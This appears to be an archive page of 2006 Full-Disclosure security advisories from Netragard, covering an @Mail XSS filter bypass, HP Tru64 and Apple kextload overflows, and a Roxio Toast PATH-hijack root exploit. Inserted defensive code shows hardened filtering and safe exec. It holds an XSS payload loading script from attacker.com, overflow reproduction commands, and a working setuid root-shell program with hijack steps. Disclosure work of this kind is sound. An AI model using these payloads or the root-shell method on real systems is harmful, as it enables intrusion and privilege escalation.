    s/On(Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|Resize|Select|Submit|Unload)/DEFANGED_On$1/gi;
}
if (/["\047][^"\047\s]*&#x?[1-9][0-9a-f]/i) {
    while (/["\047][^"\047\s]*&#((4[6-9]|5[0-8]|6[4-9]|[78][0-9]|9[07-9]|1[0-1][0-9]|12[0-2]))/) {
        $I1I111III1II = chr($1);
        s/&#$1;?/$I1I111III1II/g;
    }
    while (/["\047][^"\047\s]*&#(x(2[ef]|3[0-9a]|4[0-9a-f]|5[0-9a]|6[1-9a-f]|7[0-9a]))/i) {
        $I1I111III1II = chr( hex("0$1") );
        s/&#$1;?/$I1I111III1II/gi;
- ---8<--- SNIP Global.pm line 626 - 635 SNIP ---8<---

The above code will replace <SCRIPT with <DEFANGED_SCRIPT, but the
security created by the filtering process can be defeated. This is
because most web browsers treat characters that are neither letters nor
digits as invalid after an HTML keyword and handle them as whitespace.
An attacker can use this knowledge to attack @Mail users.

Example:

\s matches any white-space character (space and tab, as well as \n and
\r). <SCRIPT> is defanged by the above sanitization, but <SCRIPT/XSS> is
not, because the character after the tag name is '/' rather than
whitespace or '>'.

When <SCRIPT/XSS> reaches a web browser it is interpreted as <SCRIPT>
and executed; the /XSS becomes whitespace to the browser. This is a very
common filter evasion technique.

The following code will then be executed when rendering an email with
@Mail Webmail:

<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>

Please note that the email parser also rewrites http:// into an
<a href=...> link, which would break up a payload that spells out the
scheme; this is why the payload above uses a scheme-relative
//attacker.com URL.
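The evasion above, as an added example rather than @Mail's code: the Python port below reproduces the quoted tag and event-handler regexes (the entity-decoding loops are not ported), shows <SCRIPT/XSS> passing through the original pattern, and contrasts a stricter pattern that ends the tag name at any non-alphanumeric character. The sample messages are constructed.

```python
import re

# Tag and handler names copied from the regexes the advisory quotes from
# Global.pm; the entity-decoding part of that code is not ported here.
TAGS = "META|APP|SCRIPT|OBJECT|EMBED|FRAME|IFRAME|BASE|BODY"
HANDLERS = ("Abort|Blur|Change|Click|DblClick|DragDrop|Error|Focus|KeyDown|KeyPress|"
            "KeyUp|Load|MouseDown|MouseMove|MouseOut|MouseOver|MouseUp|Move|Reset|"
            "Resize|Select|Submit|Unload")

# Faithful port of the quoted filter: the name must be followed by whitespace
# or '>' before it is renamed, which is exactly what <SCRIPT/XSS> sidesteps.
ORIG_TAG_RE = re.compile(r"<(%s)(\s|>)" % TAGS, re.I)
HANDLER_RE = re.compile(r"On(%s)" % HANDLERS, re.I)


def defang_original(html):
    """Port of the Global.pm substitutions, including the '<' pre-check."""
    if "<" in html:
        html = ORIG_TAG_RE.sub(r"<DEFANGED_\1\2", html)
        html = HANDLER_RE.sub(r"DEFANGED_On\1", html)
    return html


# Hardened variant: any non-alphanumeric byte (or end of input) ends the tag
# name, mirroring the lenient browser tokenising the advisory describes, and
# end tags and whitespace after '<' are covered as well.
HARD_TAG_RE = re.compile(r"(<\s*/?\s*)(%s)(?![A-Za-z0-9])" % TAGS, re.I)


def defang_hardened(html):
    html = HARD_TAG_RE.sub(r"\1DEFANGED_\2", html)
    html = HANDLER_RE.sub(r"DEFANGED_On\1", html)
    return html


SCRIPT_START = re.compile(r"<\s*script(?![A-Za-z0-9_])", re.I)


def script_survives(payload, defang):
    """True if a script start tag is still present after running `defang`."""
    return SCRIPT_START.search(defang(payload)) is not None


# Constructed test messages: the advisory's evasion payload, a plain one,
# and an event-handler variant.
PLAIN = "<SCRIPT>alert(1)</SCRIPT>"
EVASION = "<SCRIPT/XSS src=//attacker.com/xss.js></SCRIPT>"
HANDLER = '<img src=x OnError="alert(1)">'

if __name__ == "__main__":
    for name, msg in (("plain", PLAIN), ("evasion", EVASION), ("handler", HANDLER)):
        print(name, "| original:", defang_original(msg))
        print(name, "| hardened:", defang_hardened(msg))
        print(name, "| survives original filter:", script_survives(msg, defang_original))
```

Even the stricter pattern is still a denylist; the durable fix for rendered HTML mail is an allowlisting HTML sanitizer that parses the markup rather than a regex over the raw text.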

[Full-disclosure] [NETRAGARD-20061109 SECURITY ADVISORY] [HP Tru64 libpthread buffer overflow][http://www.netragard.com]

2006-11-09 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

*** Netragard, L.L.C. Advisory ***

 Strategic Reconnaissance Team

  
  http://www.netragard.com -- We make I.T. Safe.


[Advisory Information]
- --
Advisory ID : NETRAGARD-20061109
Advisory Contact: Adriel T. Desautels
Credit  : Undisclosed
Product Name: libpthread
Product Version : 5.1b
Vendor Name : Hewlett-Packard
Type of Vulnerability   : Local Root Compromise
Effort  : Very Difficult
Operating System: Tru64
Other   : Buffer Overflow

[Product Description]
- --
The pthread library (libpthread) provides interfaces for developing
multi-threaded applications.

[Technical Summary]
- --
libpthread suffers from a buffer overflow vulnerability which may
enable an attacker to execute arbitrary commands on the system. The
vulnerability may be exploited by placing a specially crafted buffer in
the PTHREAD_CONFIG environment variable, which libpthread reads at
startup.

[Technical Details]
- --
libpthread reads in the PTHREAD_CONFIG environment variable. It may be
possible to exploit libpthread on HP's Tru64 by creating a specially
crafted buffer. The details below do not contain the specially crafted
buffer. Exploitation of this specific vulnerability is very difficult.

##
#
#   Insert 273 A's (0x41) into the PTHREAD_CONFIG variable
#
##

OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A" x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)

##
#
#   Insert 274 A's (0x41) into the PTHREAD_CONFIG variable
#
##

bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A" x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 newaliases va=0x11fff00a4 pc=0x3ff805c8bf8
ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 newaliases va=0x11fff00bc pc=0x3ff805c8bfc
ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 newaliases va=0x11fff008c pc=0x3ff805c8c48
ra=0x3ff805c8bf8 inst=0xa5090028

##
#
#   Run newaliases in gdb with the -q flag.
#
##

bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so

##
#
#   Execute a back trace (bt) within gdb
#
##

(gdb) bt
#0  0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1  0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2  0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable).  In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.

#
#   Execute Info Registers within gdb
#

(gdb) i r
v0   0x226550
t0   0x11fff9b3e          4831812414
t1   0x0                  0
t2   0x2                  2
t3   0x0                  0
t4   0x3ffc0081a00        4396973300224
t5   0x40                 64
t6   0x7fe6               2147483622
t7   0x19                 25
s0   0x4141414141414141   4702111234474983745
s1   0x11fff9c90          4831812752
s2   0x11fff9c88          4831812744
s3   0x0                  0
s4   0x0                  0
s5   0x11fff9ad8          4831812312
fp   0x1                  1
a0   0xbf                 191
a1   0x11fff9918          4831811864
a2   0x11fff96b0          4831811248
a3   0x11fff9b34          4831812404
a4   0x0                  0
a5   0x11fff9b30          4831812400
t8   0x11fff9931          4831811889
t9   0x62                 98
t10  0x49                 73
t11

[Full-disclosure] *ADVISORY UPDATE* [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]

2006-10-20 Thread Netragard Security Advisories
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Netragard has updated this advisory with new information provided
by the vendor.


*** Netragard, L.L.C. Advisory ***

 Strategic Reconnaissance Team
  
  http://www.netragard.com -- We make I.T. Safe.








[Official URL]
- -
http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt




[Advisory Information]
- --
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060810
Product Name: dtmail
Product Version : see operating system
Vendor Name : Hewlett-Packard
Criticality : Local Root Compromise
Effort  : Easy
Operating System: HP Tru64 UNIX 5.1B-3
  HP Tru64 UNIX 5.1B-2/PK4
  HP Tru64 UNIX 5.1A PK6
  HP Tru64 UNIX 4.0G PK4
  HP Tru64 UNIX 4.0F PK8
  HP-UX B.11.23
  HP-UX B.11.11
  HP-UX B.11.00
Type: Unchecked Buffer


[Product Description]
- --
The dtmail program is a desktop mail application. It provides an
easy-to-use interface for viewing, filing, composing and sending
electronic mail folders and mail messages.

dtmail provides a GUI-based interface for manipulating electronic mail
messages that can have attachments. Use the interface to compose a
message, view a message or a folder containing messages, load new mail,
copy or move messages from one folder to another, delete messages,
reply to messages, add and delete attachments to a message when
composing, and view the contents of attachments in a message. dtmail
also supplies a mail-pervasive desktop environment by providing a
public ToolTalk API that other clients can use to compose and send
messages.

You can use dtmail as a Post Office Protocol (POP) client to connect to
mail servers offering POP services. If you choose this option, you can
also select APOP authentication (if supported by your mail server) to
avoid sending your password in clear text to your network mail server.




[Technical Summary]
- --
dtmail suffers from a buffer overflow vulnerability which could result
in the execution of arbitrary code. More specifically this
vulnerability is triggered when using -a flag:

  -a file1 ...fileN

Bring up a Compose window with file1 through fileN as
attachments.




[Technical Details]
- --
This was tested against tru64 version 5.1b using a system (a working
display is required). The following gdb output demonstrates the
vulnerability.

(gdb) r -a -a `perl -e 'print "A" x 9000'`
Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e
'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140
This warning occurs if you are debugging a function without any
symbols (for example, in a stripped executable).  In that case, you
may wish to increase the size of the search with the `set heuristic-
fence-post' command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a 

Re: [Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]

2006-10-20 Thread Netragard Security Advisories

The advisory has been updated and fixed on the web page. Thank you for
catching the errors in the posting, we appreciate it.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] [NETRAGARD-20060810 SECURITY ADVISORY] [HP Tru64 dtmail Unchecked Buffer - Local Root Compromise] [ http://www.netragard.com ]

2006-10-17 Thread Netragard Security Advisories

*** Netragard, L.L.C. Advisory ***

    Strategic Reconnaissance Team
    http://www.netragard.com -- We make I.T. Safe.




[About Netragard]
- --
Netragard is a unique I.T. Security company whose services are fortified
by continual vulnerability research and development. This ongoing
research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals and
not those of automated scanners and tools.  This advisory is the product
of research done by the Strategic Reconnaissance Team.




[Official URL]
- -
http://www.netragard.com/pdfs/research/HP-TRU64-DTMAIL-20060810.txt




[Advisory Information]
- --
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060810
Product Name: dtmail
Product Version : 5.1b
Vendor Name : Hewlett Packard
Criticality : Local Root Compromise
Effort  : Easy
Operating System: Tru64
Type: Unchecked Buffer




[Product Description]
- --
The dtmail program is a desktop mail application.  It provides an easy
to use interface for viewing, filing, composing and sending
electronic mail folders and mail messages.

dtmail provides a GUI-based interface for manipulating electronic mail
messages that can have attachments. Use the interface to compose a
message, view a message or a folder containing messages, load new mail,
copy or move messages from one folder to another, delete messages,
reply to messages, add and delete attachments to a message when
composing, and view the contents of attachments in a message. dtmail
also supplies a mail-pervasive desktop environment by providing a
public Tooltalk API that other clients can use to compose and send
messages.

You can use dtmail as a Post Office Protocol (POP) to connect to mail
servers offering POP services.  If you choose this option, you can
also select APOP authentication (if supported by your mail server) to
encrypt your user ID and password during communications with your
network mail server.




[Technical Summary]
- --
dtmail suffers from a buffer overflow vulnerability which could result
in the execution of arbitrary code. More specifically this
vulnerability is triggered when using -a flag:

  -a file1 ...fileN

Bring up a Compose window with file1 through fileN as
attachments.




[Technical Details]
- --
This was tested against tru64 version 5.1b using a system (a working
display is required). The following gdb output demonstrates the
vulnerability.

(gdb) r -a -a `perl -e 'print "A" x 9000'`
Starting program: /cluster/members/member0/tmp/dtmail -a `perl -e
'print "A" x 9000'`
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414140
This warning occurs if you are debugging a function without any
symbols (for example, in a stripped executable).  In that case, you
may wish to increase the size of the search with the `set heuristic-
fence-post' command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.
0x4141414141414140 in ?? ()




[Proof of Concept]
- --
Undisclosed.




[Vendor Status]
- --
HP was contacted and a patch has been created.




   [ For more information please visit http://www.netragard.com ]



[Disclaimer]
- -http://www.netragard.com-

[Full-disclosure] [NETRAGARD-20060822 SECURITY ADVISORY] [ APPLE COMPUTER CORPORATION KEXTLOAD VULNERABILITY + ROXIO TOAST TITANIUM 7 HELPER APP - LOCAL ROOT COMPROMISE]

2006-09-13 Thread Netragard Security Advisories


*** Netragard, L.L.C. Advisory ***

    Strategic Reconnaissance Team
    http://www.netragard.com -- We make I.T. Safe.



[About Netragard]
- --
Netragard is a unique I.T. Security company whose services are fortified
by continual vulnerability research and development. This ongoing
research, which is performed by our Strategic Reconnaissance
Team, specifically focuses on Operating Systems, Software Products and
Web Applications commonly used by businesses internationally. We apply
the knowledge gained by performing this research to our professional
security services. This in turn enables us to produce high quality
deliverables that are the product of talented security professionals and
not those of automated scanners and tools.  This advisory is the product
of research done by the Strategic Reconnaissance Team.


[Official URL]
- --
http://www.netragard.com/pdfs/research/apple-kext-tools-20060822.txt


[Advisory Information]
- --
Contact : Adriel T. Desautels
Advisory ID : NETRAGARD-20060822
Product Name: Apple OSX
Product Version : ALL
Helper Application  : Roxio Toast 7 Titanium
Vendor Name : Apple Computer Corporation
Type of Vulnerability   : Local Root Compromise (via kextload)
Effort  : Easy
Operating System: OSX

- --
Other   : A vulnerability exists in the OSX kextload program
  which affects the security of Roxio Toast 7 and may affect
  other applications.

  This advisory contains two vulnerabilities in the kextload
  program:

  1-) Format String Vulnerability
  2-) Buffer Overflow Vulnerability


[Product Description]
- --
Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast.

- --http://www.roxio.com--



[Technical Summary]
- --
Roxio toast executes the kextload command with root privileges. The
kextload command contains two vulnerabilities which can be exploited
by a local user to gain local root access to the system. This advisory
outlines both issues.

The kextload program is used to explicitly load kernel extensions
(kexts), validate them to see that they can be loaded by other
mechanisms, such as kextd(8), and to generate symbol files for
debugging the kext in a running kernel.  In order to load a kext into
the kernel kextload must be invoked as the superuser; for all other
uses it can be invoked by any user.


!! Important Note: A user requires root to run kextload properly, or !!
!! kextload needs to be run by a helper application with root        !!
!! privileges.                                                       !!





[Technical Details]
- --
1-) kextload format string vulnerability.

Executing sudo kextload %x.%x.%x.%x.%x.%x demonstrates the
vulnerability.  The code which enables this format string
vulnerability can be found in prelink.c and reads as

fprintf(stderr, kext_path);

netragard-test$ sudo kextload %x.%x.%x.%x.%x.%x
kextload: /Users/test/90b4b6ca.1c.69737473.65206578.68206275.6e646c65:\
no such bundle file exists
can't add kernel extension %x.%x.%x.%x.%x.%x (file access/permissions\
) (run kextload on this kext with -t for diagnostic output)

2-) Buffer Overflow Vulnerability

Executing kextload `perl -e 'print "A" x 1022'` causes a
buffer overflow. We can see that critical memory segments
have been overwritten by A in the example below.

(A is represented as 0x41)

(gdb) r `perl -e 'print "A" x 1023'`
Starting program: /sbin/kextload `perl -e 'print "A" x 1023'`
memory allocation or string conversion error
Program exited with code 01.

(gdb) r `perl -e 'print "A" x 1022'`
Starting program: /sbin/kextload `perl -e 'print "A" x 1022'`
Program received signal EXC_BAD_ACCESS, Could not 
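An added example, not kextload's or Netragard's code, showing the two defects the advisory describes (a user-controlled string passed as the format argument, and an unbounded copy of the argument into a fixed buffer) beside one hardened routine; the bounded-copy part applies equally to the over-long -a argument in the dtmail advisory above. The 1024-byte buffer size is an assumption taken from the 1022/1023-character threshold in the gdb output.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 1024   /* assumed size of the fixed path buffer */

/* The vulnerable shape from the advisory, for contrast only, never called:
 *     char path[PATH_BUF];
 *     strcpy(path, argv[1]);     // overruns the buffer past 1023 bytes
 *     fprintf(stderr, path);     // user data interpreted as a format string
 */

/* Copy an untrusted argument into a fixed buffer. Returns 0 on success or
 * -1 when src (plus its terminating NUL) does not fit; the caller then
 * reports an error instead of writing past the buffer. */
int copy_kext_path(char *dst, size_t dst_len, const char *src)
{
    const char *nul = memchr(src, '\0', dst_len);
    if (nul == NULL)                /* no NUL within dst_len bytes: too long */
        return -1;
    memcpy(dst, src, (size_t)(nul - src) + 1);
    return 0;
}

/* Build the "no such bundle" diagnostic with the path passed as *data* to
 * a fixed "%s" format, so "%x" in the path is printed literally. Returns
 * the message length, or -1 if the message would have been cut off. */
int format_bundle_error(char *out, size_t out_len, const char *kext_path)
{
    int need = snprintf(out, out_len,
                        "kextload: %s: no such bundle file exists", kext_path);
    if (need < 0 || (size_t)need >= out_len)
        return -1;
    return need;
}

int main(int argc, char **argv)
{
    char path[PATH_BUF];
    char msg[PATH_BUF + 64];
    /* constructed probe: the same directives the advisory passed on the command line */
    const char *arg = argc > 1 ? argv[1] : "%x.%x.%x.%x.%x.%x";

    if (copy_kext_path(path, sizeof path, arg) != 0) {
        fputs("kextload: argument too long\n", stderr);
        return 1;
    }
    if (format_bundle_error(msg, sizeof msg, path) < 0)
        return 1;
    fprintf(stderr, "%s\n", msg);   /* prints the %x sequence as plain text */
    return 0;
}
```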

[Full-disclosure] [NETRAGARD-20060624 SECURITY ADVISORY] [ROXIO TOAST 7 TITANIUM - LOCAL ROOT COMPROMISE ]

2006-08-17 Thread Netragard Security Advisories
 
**
Netragard, L.L.C.   --Vulnerability Research and Exploitation Team

 www.netragard.com

[Advisory Information]
- --
Contact:   : Adriel T. Desautels
Advisory ID: NETRAGARD-20060624
Product Name   : Roxio Toast
Product Version: 7 Titanium
Vendor Name: Roxio
Type of Vulnerability  : Local Root Compromise
Effort : Easy
Operating System   : OSX
Other  : Insecure usage of $PATH



[Product Description]
- --
Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast.

- --http://www.roxio.com--



[Technical Summary]
- --
Doing a default installation of Roxio Toast 7 Titanium also installs
DejaVu which is used for backups. DejaVu uses a control panel helper
application which makes insecure system() calls. More specifically,
an attacker can exploit these system() calls using the user controlled
environment variable named $PATH and gain root access to the system.



[Technical Details]
- --

This was tested using a configured version of Roxio Toast 7 Titanium.


Roxio 7 Toast contains locally exploitable vulnerabilities due to
insecure system() calls by suid binaries which use the user's $PATH
environment variable.

The following shows the DejaVu suid binaries:

netragard-test-1$ find . -perm -4000
./DejaVu.prefPane/Contents/Resources/abort_backup
./DejaVu.prefPane/Contents/Resources/archive_table
./DejaVu.prefPane/Contents/Resources/install_crontab
./DejaVu.prefPane/Contents/Resources/install_scripts
./DejaVu.prefPane/Contents/Resources/manual_backup
./DejaVu.prefPane/Contents/Resources/remove_scripts


1-Exploitation is trivial. A user must first create small program such
as the one demonstrated by simple.c below.

netragard-test-1$ cat simple.c

#include <stdlib.h>
#include <unistd.h>

int main(void)
{
    /* become root for real before spawning the shell */
    seteuid(0);
    setuid(0);
    setegid(0);
    setgid(0);
    system("/bin/sh -i");
    return 0;
}

2-Once the user has created the program, the user must compile the
program, copy the program to replace rm, mv and cat, and insert it
into the $PATH variable.

netragard-test-1$ cc -o chmod simple.c
netragard-test-1$ cp chmod /tmp/rm
netragard-test-1$ cp chmod /tmp/mv
netragard-test-1$ cp chmod /tmp/cat
netragard-test-1$ export PATH=/tmp/:$PATH

3-Once the user has finished with step 2, the user must then launch
the System Preferences control panel.

netragard-test-1$ /Applications/System\
Preferences.app/Contents/MacOS/System\ Preferences

4-After the user has launched the System Preferences helper
application, a GUI window should display. From that window click on
Deja Vu located in the other section. From there create a manual
backup and then click the backup button. At that point you should be
presented with a root shell prompt:

sh: no job control in this shell
sh-2.05b# id

uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)



[Proof Of Concept]
- --
Successfully Created and Functional



[Vendor Status]
- --
Vendor contacted and notified of the issue.

Vendor Comment:
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio
Toast and is third party software. Deja Vu is authored by Propaganda
Productions and not Sonic.


[About Netragard]
- --
Netragard offers specialized application and network security services
which enable its clients to take a proactive security stance. Each of
our services is driven by security professionals who specialize in
specific areas of Information Security. This specialized focus
differentiates Netragard from the competition by enabling Netragard
to produce deliverables which are the product of skilled security
professionals and not the product of automated tools and scripts.

   
   [ For more information please visit http://www.netragard.com ]


[Disclaimer]
- -http://www.netragard.com-
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
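An added example, not DejaVu's, Roxio's or Netragard's code, contrasting the bug class above (a suid helper calling system() with a bare command name that the caller's $PATH resolves) with a launcher that runs only absolute program paths under a fixed environment and without a shell. The fixed PATH value and the program paths are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* The vulnerable shape from the advisory, for contrast only, never called:
 *     system("rm -f /Library/Backups/old.tar");   // which "rm"? whatever
 *                                                 // $PATH says: /tmp/rm
 */

/* Fixed environment for every child: the caller's PATH, IFS and loader
 * variables are dropped, not inherited. The PATH value is an assumption. */
static char *const SAFE_ENV[] = { "PATH=/usr/bin:/bin:/usr/sbin:/sbin", NULL };

/* Accept only an absolute program path with no ".." component. */
int is_trusted_program(const char *prog)
{
    if (prog == NULL || prog[0] != '/')
        return 0;
    const char *p = prog;
    while ((p = strstr(p, "..")) != NULL) {
        int at_start = (p == prog) || (p[-1] == '/');
        int at_end = (p[2] == '\0') || (p[2] == '/');
        if (at_start && at_end)
            return 0;
        p += 2;
    }
    return 1;
}

/* Run argv[0] under SAFE_ENV with execve, so no shell and no PATH search.
 * Returns the child's exit status, or -1 if the program was rejected or
 * could not be started. */
int run_trusted(char *const argv[])
{
    if (argv == NULL || !is_trusted_program(argv[0]))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, SAFE_ENV);
        _exit(127);                       /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status) == 127 ? -1 : WEXITSTATUS(status);
}

int main(void)
{
    char *const bare[] = { "rm", "-f", "/tmp/x", NULL };      /* advisory's pattern */
    char *const ok[] = { "/bin/sh", "-c", "echo \"PATH=$PATH\"", NULL };
    printf("bare name rejected without running: %d\n", run_trusted(bare));
    return run_trusted(ok) == 0 ? 0 : 1;
}
```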

Re: [Full-disclosure] Re: ICMP DestinationUnreachable Port Unreachable

2006-08-16 Thread Netragard Security Advisories
Fetch,
I had already considered that actually. I found that it was just
back scatter though. Someone must have been doing something naughty and
I caught a little bit of the noise. Nevertheless, weird payloads...
but nothing for me to be concerned about.

Fetch, Brandon wrote:
 Isn't there a new Trojan that's using ICMP to send back its pilfered
 data?  It's encrypted (if I remember correctly) so no clear-text reading
 of what's sent and that may explain why you're seeing the random data.

 The padding of the same characters in individual packets may designate
 start/stop points in the transmission segments.

 Just my $.02...

 Brandon

 -Original Message-
 From: [EMAIL PROTECTED]
 [mailto:[EMAIL PROTECTED] On Behalf Of Adriel
 T. Desautels
 Sent: Wednesday, August 16, 2006 10:30 AM
 To: Adriel T. Desautels
 Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED]
 Subject: Re: [Full-disclosure] Re: ICMP DestinationUnreachable Port
 Unreachable

 Also,
 I failed to mention that they came in bursts of 3 every 5 minutes on
 the dot.

 Adriel T. Desautels wrote:
  Well,
  After over 100,000 alerts each with very different payloads the
  traffic stopped. I do have a list of all of the dropped packets from my
  firewall as well and it appears that it was hitting 3 IP addresses which
  are public facing, not just one. The weird part, is that two of those
  three aren't even live. So I think that this may have been noise from a
  different attack...

  I'd be very interested in decoding the payloads for some of these.
  Anyone here have any tools to do such a decode? I'd rather not do it
  manually if at all possible.

  [EMAIL PROTECTED] wrote:
   On Wed, 16 Aug 2006 12:33:13 BST, Barrie Dempster said:
    Although the port 0 in this case is a red herring and irrelevant. Port 0
    itself when used with TCP/UDP (not ICMP!) can actually be used on the
    Internet. A while back I modified netcat and my linux kernel so that it
    would allow usage of port 0 and was able to connect to a remote machine
    via TCP with that port and communicate fine.

   Of course, the poor security geek who sees a TCP SYN from port 0 to
   port 0, and then a SYN+ACK reply back, will be going WTF??!? for the rest
   of the day. :)

   (Another good one to induce head-scratching is anything that does
   RFC1644-style T/TCP.  Anytime you see a packet go by in one direction
   with SYN/FIN *and* data, and the reply has SYN/ACK/FIN and data on it... ;)


-- 


Regards, 
Netragard Vulnerability Research Team
advisories at netragard dot com
http://www.netragard.com
-
We make I.T. Secure





